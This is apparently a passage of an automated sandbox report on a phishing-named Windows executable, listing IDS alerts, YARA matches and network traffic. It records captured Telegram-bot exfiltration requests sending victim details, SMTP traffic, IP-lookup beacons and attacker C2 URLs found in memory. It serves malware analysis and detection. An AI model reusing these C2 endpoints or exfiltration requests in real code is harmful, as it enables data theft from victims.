                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663B3C8h9_2_0663B2F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663DFC9h9_2_0663DD20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663FB11h9_2_0663F868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663DB71h9_2_0663D8C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D9C38h9_2_066D9940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D4160h9_2_066D3E68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D5948h9_2_066D5650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D8918h9_2_066D8620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D7130h9_2_066D6E38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D2978h9_2_066D2680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D1190h9_2_066D0E98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D62D8h9_2_066D5FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D4AF0h9_2_066D47F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D7AC0h9_2_066D77C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D92A8h9_2_066D8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D9770h9_2_066D9478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D1FE8h9_2_066D1CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D4FB8h9_2_066D4CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D37D0h9_2_066D34D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D67A0h9_2_066D64A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D7F88h9_2_066D7C90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D0800h9_2_066D0508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D8DE0h9_2_066D8AE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D1658h9_2_066D1360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D2E40h9_2_066D2B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D4628h9_2_066D4330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D75F8h9_2_066D7300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D5E10h9_2_066D5B18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D0338h9_2_066D0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D1B20h9_2_066D1828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D3308h9_2_066D3010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D6C68h9_2_066D6970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D8451h9_2_066D8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D0CC8h9_2_066D09D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D3C98h9_2_066D39A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D24B0h9_2_066D21B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D5480h9_2_066D5188

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49962 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49853 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.10:49918 -> 208.91.199.225:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:11:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:22:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                  Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49772 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49871 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49889 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49754 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49901 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49766 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49958 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49785 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49843 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49808 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49832 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49886 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49937 -> 104.21.96.1:443
                  Source: global trafficTCP traffic: 192.168.2.10:49918 -> 208.91.199.225:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49760 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49877 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,1_2_00F8CE44
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:11:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:22:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 15:57:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 15:57:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.000000000296D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.000000000298F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
